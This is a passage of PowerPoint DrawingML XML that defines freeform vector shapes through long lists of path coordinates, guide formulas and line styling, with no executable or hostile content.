                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="936" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="926" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="901" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="883" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="814" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="821" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="834" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="814" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="759"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="799"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="934"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="941"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="1020"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="785" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="990"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="966"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36212" name="Freeform 345"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1871" y="1357"/>
                <a:ext cx="46" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 46"/>
                  <a:gd name="T1" fmla="*/ 45 h 45"/>
                  <a:gd name="T2" fmla="*/ 14 w 46"/>
                  <a:gd name="T3" fmla="*/ 42 h 45"/>
                  <a:gd name="T4" fmla="*/ 9 w 46"/>
                  <a:gd name="T5" fmla="*/ 36 h 45"/>
                  <a:gd name="T6" fmla="*/ 3 w 46"/>
                  <a:gd name="T7" fmla="*/ 32 h 45"/>
                  <a:gd name="T8" fmla="*/ 2 w 46"/>
                  <a:gd name="T9" fmla="*/ 30 h 45"/>
                  <a:gd name="T10" fmla="*/ 0 w 46"/>
                  <a:gd name="T11" fmla="*/ 25 h 45"/>
                  <a:gd name="T12" fmla="*/ 0 w 46"/>
                  <a:gd name="T13" fmla="*/ 8 h 45"/>
                  <a:gd name="T14" fmla="*/ 2 w 46"/>
                  <a:gd name="T15" fmla="*/ 1 h 45"/>
                  <a:gd name="T16" fmla="*/ 4 w 46"/>
                  <a:gd name="T17" fmla="*/ 0 h 45"/>
                  <a:gd name="T18" fmla="*/ 9 w 46"/>
                  <a:gd name="T19" fmla="*/ 3 h 45"/>
                  <a:gd name="T20" fmla="*/ 17 w 46"/>
                  <a:gd name="T21" fmla="*/ 4 h 45"/>
                  <a:gd name="T22" fmla="*/ 26 w 46"/>
                  <a:gd name="T23" fmla="*/ 10 h 45"/>
                  <a:gd name="T24" fmla="*/ 32 w 46"/>
                  <a:gd name="T25" fmla="*/ 16 h 45"/>
                  <a:gd name="T26" fmla="*/ 36 w 46"/>
                  <a:gd name="T27" fmla="*/ 18 h 45"/>
                  <a:gd name="T28" fmla="*/ 42 w 46"/>
                  <a:gd name="T29" fmla="*/ 22 h 45"/>
                  <a:gd name="T30" fmla="*/ 46 w 46"/>
                  <a:gd name="T31" fmla="*/ 29 h 45"/>
                  <a:gd name="T32" fmla="*/ 45 w 46"/>
                  <a:gd name="T33" fmla="*/ 33 h 45"/>
                  <a:gd name="T34" fmla="*/ 44 w 46"/>
                  <a:gd name="T35" fmla="*/ 34 h 45"/>
                  <a:gd name="T36" fmla="*/ 40 w 46"/>
                  <a:gd name="T37" fmla="*/ 35 h 45"/>
                  <a:gd name="T38" fmla="*/ 35 w 46"/>
                  <a:gd name="T39" fmla="*/ 36 h 45"/>
                  <a:gd name="T40" fmla="*/ 29 w 46"/>
                  <a:gd name="T41" fmla="*/ 40 h 45"/>
                  <a:gd name="T42" fmla="*/ 22 w 46"/>
                  <a:gd name="T43" fmla="*/ 43 h 45"/>
                  <a:gd name="T44" fmla="*/ 18 w 46"/>
                  <a:gd name="T45" fmla="*/ 45 h 4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46"/>
                  <a:gd name="T70" fmla="*/ 0 h 45"/>
                  <a:gd name="T71" fmla="*/ 46 w 46"/>
                  <a:gd name="T72" fmla="*/ 45 h 45"/>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46" h="45">
                    <a:moveTo>
                      <a:pt x="18" y="45"/>
                    </a:moveTo>
                    <a:lnTo>
